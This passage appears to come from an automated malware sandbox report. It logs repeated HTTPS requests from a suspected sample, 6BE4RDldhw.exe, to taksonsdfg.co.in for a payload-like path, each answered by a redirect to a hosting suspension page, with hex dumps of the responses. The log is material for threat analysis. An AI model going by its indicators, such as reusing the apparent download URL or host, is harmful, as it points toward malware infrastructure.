                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:12:16 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                3192.168.2.749721108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:12:17 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:12:18 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:12:17 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:12:18 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:12:18 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:12:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                4192.168.2.749728108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:12:19 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:12:20 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:12:20 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:12:20 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                5192.168.2.749729108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:12:21 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:12:22 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:12:22 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:12:22 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:12:22 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:12:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                6192.168.2.749737108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:12:24 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:12:24 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:12:24 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:12:24 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                7192.168.2.749744108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:12:25 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:12:26 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:12:26 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:12:26 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:12:26 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:12:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                8192.168.2.749752108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:12:28 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:12:29 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:12:28 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:12:29 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                9192.168.2.749760108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:12:30 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:12:31 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:12:30 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:12:31 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
                                2024-11-26 07:12:31 UTC6588INData Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74
                                Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
                                2024-11-26 07:12:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                10192.168.2.749767108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:12:32 UTC194OUTGET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:12:33 UTC446INHTTP/1.1 302 Found
                                Connection: close
                                content-type: text/html
                                content-length: 771
                                date: Tue, 26 Nov 2024 07:12:33 GMT
                                server: LiteSpeed
                                cache-control: no-cache, no-store, must-revalidate, max-age=0
                                location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:12:33 UTC771INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c
                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                11192.168.2.749773108.170.55.2024437796C:\Users\user\Desktop\6BE4RDldhw.exe
                                TimestampBytes transferredDirectionData
                                2024-11-26 07:12:34 UTC175OUTGET /cgi-sys/suspendedpage.cgi HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                Host: taksonsdfg.co.in
                                2024-11-26 07:12:35 UTC325INHTTP/1.1 200 OK
                                Connection: close
                                content-type: text/html
                                transfer-encoding: chunked
                                date: Tue, 26 Nov 2024 07:12:35 GMT
                                server: LiteSpeed
                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                2024-11-26 07:12:35 UTC1043INData Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65
                                Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
